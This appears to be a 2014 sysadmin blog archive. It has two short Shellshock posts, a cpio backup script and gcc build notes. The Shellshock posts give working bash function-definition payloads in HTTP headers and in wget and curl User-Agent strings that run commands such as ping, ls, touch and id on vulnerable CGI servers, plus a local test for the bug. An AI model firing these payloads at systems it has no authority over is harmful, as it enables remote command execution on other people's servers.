Monday, September 29, 2014

thanks f5

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: () { :; }; ping -c 17
Host:() { :; }; ls -la 
Referer: () { :; }; ping -c 23

Thursday, September 25, 2014

with a rusty spoon

well kids. this just sucks donkey balls. get shell and issue:
 env x='() { :;}; echo vulnerable' bash -c "echo this is a test"  
if you see vulnerable you're in a bad trip.
it gets better. say you have cgi-bin enabled and not in perl taint mode. run this:
 wget -U "() {test;}; `which touch` /tmp/VULNERABLE" http://server/cgi-bin/valid.cgi  

and better.

curl -A '() { :;}; echo Content-Type: text/html; echo; echo `/usr/bin/id`' http://yourserver/your.cgi

with a rusty spoon.

Wednesday, September 24, 2014

simple cpio script

rsync is fine. but seeding a directory first is better. i like to do this on local private networks with cpio because the compression and security aren't really a concern.
thus, a simple, recursive cpio script. for dumping a local directory to an nfs mount.
echo start "$(date)" >> /var/log/cpio.log ;
find /home/ -depth -print0 | cpio -0pdumv /nfs/mount ;
echo end "$(date)" >> /var/log/cpio.log ;

Wednesday, September 17, 2014

install gcc notes

1) Get the desired version from SVN, e.g. from svn://
(To install SVN, see how to Work with SVN) 

2) Check to make sure, config.sub and config.guess files are present in your gcc directory. If not, copy them into your unzipped gcc directory:

me@there:~/tools/gcc> cp -p /usr/share/automake-1.9/install-sh .
me@there:~/tools/gcc> cp -p /usr/share/automake-1.9/config.sub .
me@there:~/tools/gcc> cp -p /usr/share/automake-1.9/config.guess .

3) Sample config for SUSE 10 Linux, x86_64

me@there:~/tools/gcc> mkdir objdir
me@there:~/tools/gcc> cd objdir
me@there:~/tools/gcc/objdir> ../configure --enable-threads=posix --prefix=/usr --with-local-prefix=/usr/local
            --infodir=/usr/share/info --mandir=/usr/share/man --libdir=/usr/lib64 --libexecdir=/usr/lib64
            --enable-languages=c,c++,objc,fortran,java,ada --enable-checking=release --with-gxx-include-dir=/usr/include/c++/4.1.0
            --enable-ssp --disable-libssp --enable-java-awt=gtk --enable-gtk-cairo --disable-libjava-multilib --with-slibdir=/lib64
            --with-system-zlib --enable-shared --enable-__cxa_atexit --enable-libstdcxx-allocator=new --without-system-libunwind
            --with-cpu=generic --host=x86_64-suse-linux
Instructions on how to install GCC can be found here:


1) Search for an rpm package for your specific OS, e.g.:

2) You can make a symbolic link to the newly uploaded gcc in /usr/bin